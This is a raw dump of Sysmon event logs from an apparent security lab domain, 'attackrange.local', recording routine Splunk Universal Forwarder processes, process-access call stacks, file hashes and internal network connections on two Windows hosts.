Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108718Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.910{58E9C193-B5E9-615A-9902-00000000FC01}8260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108717Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.278{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83EB41DE704D6C79A154D0842795540B,SHA256=B2D6F9BD4D132CEC41E42ABBEA9DE86432CCB4ED59A39E8D955EAE3D718ACDA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108716Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.178{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1BA61AEAF484A3C65728B34E4C7C2B,SHA256=87BFEA71CD6E199E9B25E6897F86540740F235F6A9ACC8C567C2E5E2618F0874,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084196Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:02.759{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E697CA643DCE36A75C0AD64A0FF39EAC,SHA256=913E08E15B3ED5CDFC123D2BEA645F5EB9DC4303BEE0A39D776758293F6F6B56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108736Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.978{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5EA-615A-9A02-00000000FC01}8112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108735Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.974{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5EA-615A-9A02-00000000FC01}8112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108734Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.975{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108733Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.975{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108732Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.974{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108731Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.974{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108730Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.974{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5EA-615A-9A02-00000000FC01}8112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108729Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.973{58E9C193-B5EA-615A-9A02-00000000FC01}8112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108728Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.925{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B723A5651F6CD19EF278CD46B6F05271,SHA256=0DBCE2D14329753710CE0A39A6D6F7B09FC9CE6BCAE1E140BCCBD14194B54D4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108727Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.210{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79CD6BB058D59B2C1A5E297B75CEA403,SHA256=4B998FB4E04B35CB70E7EFD97E9C89879E402BA304FB9921D264CCA64BF223A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108726Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:02.110{58E9C193-B5E9-615A-9902-00000000FC01}82608316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000084198Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:03.790{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B22B6300E782F828806F2BB684AACAD4,SHA256=47BA4483B8B9EA234D1B33B16DDE42484AE36A16D60C42945D74ECEA1C1F3A28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.908{58E9C193-B5EB-615A-9B02-00000000FC01}59483652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5EB-615A-9B02-00000000FC01}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5EB-615A-9B02-00000000FC01}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.640{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5EB-615A-9B02-00000000FC01}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.641{58E9C193-B5EB-615A-9B02-00000000FC01}5948C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000108739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:01.372{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51986-false10.0.1.12-8000- 23542300x8000000000000000108738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.225{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B203DEE1458FB45609EB3385C81D167,SHA256=0D8FB8A34BF35D6C59CB254133596FC8FB0AA453C7FA9ED25917C7312426DC05,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084197Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:00.772{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50219-false10.0.1.12-8000- 10341000x8000000000000000108737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:03.209{58E9C193-B5EA-615A-9A02-00000000FC01}81128212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000084199Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:04.790{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FB3023B0C22641716581582D3A19F6,SHA256=05296AAB71ED22AFD81078DFA13D4033045F98009EFCEB03968012D419078125,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:04.239{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1557B5227408812A8057DA5176D13A9,SHA256=95EFADC276296CE811E56B7DAF826E1C3F17DCDA686B6385A9311F2E760F4A9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:04.005{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AF63C5EF84DAA9E5D8CF2401EAFC82C,SHA256=4F07A6E728E877275BCA88100976AAC44038852B92C7CBDC6096FC0DA625721C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084200Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:06:05.806{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E60582AC2DAB3D3D994E140D3F27A748,SHA256=A7EBDC5ACFDFDB8E81DABA1C68B48FF7EE86463287FC757613F1F588C398DD42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5ED-615A-9C02-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 